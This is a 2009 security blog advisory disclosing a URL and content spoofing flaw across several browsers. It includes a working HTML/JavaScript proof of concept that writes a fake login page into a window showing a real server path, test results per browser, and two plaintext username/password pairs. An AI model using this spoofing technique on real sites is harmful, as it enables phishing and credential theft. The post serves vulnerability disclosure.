Multiple Browsers Fake url folder & file Same origin Spoof

Saturday, August 15, 2009
#########################################
Multiple Browsers Fake url folder & file Same origin Spoof
Original Article:http://lostmon.blogspot.com/
2009/08/multiple-browsers-fake-url-folder-file.html
##########################################

##############
Abstract
##############

One user open his browser and try to navigate to
http://www.host.com/admin/admin.php this url is in
the remote server and if the user has privileges ,
can access to file admin.php

If the file admin.php isn`t in the server
the user get a 404 http error by server.

If the user try to browse http://www.host.com/admin/
and this path isn´t in the server , the user get again a 404
http error.

If the user press refresh button the page reloads the content
and if the user press ctrl+f5 it refresh all content from
the page.

Some times those http errors like 404 ,403 etc are managed
by a third part app, a toolbar, or with a predefined
dynamic content build inside the browser.

#######################
Explanation
#######################

Multiple browsers have a flaw in this request response
that allow a attacker to spoof the url or spoof the content
from a inexistent file or path or spoof the url and content
from a trust file or Path.

Also a attacker can "trap" the broser in spoofed web and
wen the user press f5 or refresh button , the page show
the spoofed content or if the user press ctrl+f5 the page
show the spoofed content , Only in Opera Browser this last
issue does not work.


##################
Testing
##################

I test it with windows xp home sp3 fully patched.
for testing let´s to write some script like:

####################
SOURCE CODE OF POC
####################
online PoC =>http://cmspatch.200u.com/urlspoof.html
<html>
<head></head><body>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof By Lostmon</h1>
</center>
<p>
<a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h3></a>
<a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non existent path
<a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a>  this file exist in the server.
<a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>only exist Protected and have password.
<p></p>
<strong>pass for the cms. user Dismark pass souaktendio.</strong><br>
<strong>pass for Portected folder. user terrapro pass mayoristas.</strong>
<p>

<script>
function spoofolder()
{
a = window.open('modules/login')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofile()
{
a = window.open('modules/system/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
function spoofauth()
{
a = window.open('protected/admin/admin.php')
a.document.write('<H1>FAKE LOGIN PAGE<\h1>')
a.document.write('<title>FAKE LOGIN PAGE</title>')
a.alert(document.location)
a.stop();
}
</script>
</body></html>

######## END SOURCE #####

Save it as c:/test/urlspoof.html for example.
I use one alert for show the real window.location.
for testing i have open the file using file:/// protocol handler
and for remote test i have upload the file to a server.
to a apache in windows 2003 and in a apache on linux red hat.

server windows:
Windows Server 2003
Apache/2.2.8 Win32
PHP/5.2.6
Server at ***********.com

server linux:

Apache/2.2.11 (Unix) mod_ssl/2.2.11
OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1
FrontPage/5.0.2.2635 Server
at ***********.com

in all test cases the server send the correct
http response.

########################
Localy afected Browsers
########################

For this test i use file protocol handler and
only test file spoof and path spoof.

1 - Firefox 3.5.1 and 3.5.2
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases firefox show the spoofed
url and content.(firefox 3.5.2 seems not vulnerble)

2 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in al cases Lunascape show the
spoofed url and content spoofed.

3 - Orca browser 1.2 build 2 seems not vulnerable ,but wen browse the file
the browsers add to url wyciwyg://4/ and executes the fake content.

4 - Flock 2.5.1
open urlspoof via file c:/test/urlspoof.html and clik
in any spoof function in all cases Flock show the
spoofed url and content spoofed.

5 - K-Meleon 1.5.3
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases K-Meleon show the
spoofed url and content spoofed.

6 - SeaMonkey 1.1.17
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases SeaMonkey show the
spoofed url and content spoofed.

7 - Avant browser 11.7 build 36
open urlspoof via file c:/test/urlspoof.html and click
in any spoof function in all cases Avant show the
spoofed url and content spoofed.


Google chrome 2.0.172.39 (Build oficial )
write in all tree cases in about:blank.

Internet Explorer 8 seems not vulnerable via file: protocol


########################
Remote afected Browsers
########################

For this test up the file to a server
and browse to file via http://host.com/urlspoof.html

1 - Internet explorer 7 and 8
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

2 - Avant browser 11.7 build 35 and build 36
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

3 - Lunascape 5.1.3 and 5.1.4 (swiched to Trident engine)
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

4 - Maxthon Browser 2.5.3.80 UNICODE
Browse to file and click in any link, the browser in all
tree test show the spoofed file, spoofed path , and "pseudo-bypass"
auth basic protection.

Google chrome write in all cases in about:blank

#################
Trap issue
#################

All of afected browsers , wen you are in the Fake url
wen you try to reload or refresh the location , via ctrl+f5
or f5 or similar the browser not show a 404 http error,
it continue showing the fake page location.
it is very interesting , because a attacker can create a "ghost" file
in a "ghost" path.
in the case of the fake File, we can spoof any web page on the server
with the fake page and wen the user try to reload it or refresh
the browser shows the fake page not the real page location.

##################€nd ##################

Thnx to cLimbo for Spread the Word
Thnx to estrella to be my ligth.
Thnx to all Lostmon Groups Team.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...